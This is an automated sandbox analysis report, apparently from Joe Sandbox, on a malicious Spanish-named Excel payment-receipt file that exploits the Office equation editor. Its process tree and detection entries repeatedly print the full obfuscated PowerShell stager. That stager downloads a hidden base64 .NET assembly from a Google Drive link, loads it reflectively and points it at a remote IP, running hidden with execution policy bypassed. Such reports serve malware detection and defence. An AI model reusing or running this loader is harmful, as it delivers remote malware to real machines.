Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Comprobante de pago.xlam.xlsx

Overview

General Information

Sample name:Comprobante de pago.xlam.xlsx
Analysis ID:1540839
MD5:3739645f289889f9008d2607eb2558e1
SHA1:d32ffac570a059cc5582e7eb4668bb34c2b3fcc7
SHA256:c43a3a0ce7d7879849045e4ff17ff6f6d74a3462bd2da91e0f0284d3768a2b96
Tags:xlamxlsxuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell Download and Execute IEX
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3412 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3620 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3756 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaystuff.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x27b:$s1: <legacyDrawing r:id="
  • 0x2a3:$s2: <oleObject progId="
  • 0x2e4:$s3: autoLoad="true"
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3832INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x236b2:$b2: ::FromBase64String(
  • 0x23c55:$b2: ::FromBase64String(
  • 0x2465e:$b2: ::FromBase64String(
  • 0x25750:$b2: ::FromBase64String(
  • 0x25e14:$b2: ::FromBase64String(
  • 0x2664d:$b2: ::FromBase64String(
  • 0x26c6f:$b2: ::FromBase64String(
  • 0x8c2c0:$b2: ::FromBase64String(
  • 0x225c9:$b3: ::UTF8.GetString(
  • 0x22e44:$b3: ::UTF8.GetString(
  • 0x2343c:$b3: ::UTF8.GetString(
  • 0x239df:$b3: ::UTF8.GetString(
  • 0x243e8:$b3: ::UTF8.GetString(
  • 0x254da:$b3: ::UTF8.GetString(
  • 0x25b9e:$b3: ::UTF8.GetString(
  • 0x263d7:$b3: ::UTF8.GetString(
  • 0x269f9:$b3: ::UTF8.GetString(
  • 0x340c2:$b3: ::UTF8.GetString(
  • 0x34944:$b3: ::UTF8.GetString(
  • 0x353bb:$b3: ::UTF8.GetString(
  • 0x35e09:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 3932JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 3932INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x7247:$b2: ::FromBase64String(
    • 0x18cf7:$b2: ::FromBase64String(
    • 0x1930e:$b2: ::FromBase64String(
    • 0x7f927:$b2: ::FromBase64String(
    • 0x8070e:$b2: ::FromBase64String(
    • 0x80d36:$b2: ::FromBase64String(
    • 0x96004:$b2: ::FromBase64String(
    • 0xa0731:$b2: ::FromBase64String(
    • 0xcf4f2:$b2: ::FromBase64String(
    • 0xcfb08:$b2: ::FromBase64String(
    • 0xd61d3:$b2: ::FromBase64String(
    • 0xd67f0:$b2: ::FromBase64String(
    • 0xd701b:$b2: ::FromBase64String(
    • 0xd7809:$b2: ::FromBase64String(
    • 0x1364bf:$b2: ::FromBase64String(
    • 0x136ad6:$b2: ::FromBase64String(
    • 0x137c29:$b2: ::FromBase64String(
    • 0x1a78b6:$b2: ::FromBase64String(
    • 0x1a7eed:$b2: ::FromBase64String(
    • 0x1c7b0c:$b2: ::FromBase64String(
    • 0x1cd738:$b2: ::FromBase64String(

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.216.142, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3620, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3620, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\WEDNESDAY-constraints[1].vbs

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAt
    Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3620, Protocol: tcp, SourceIp: 192.3.216.142, SourceIsIpv6: false, SourcePort: 80
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZ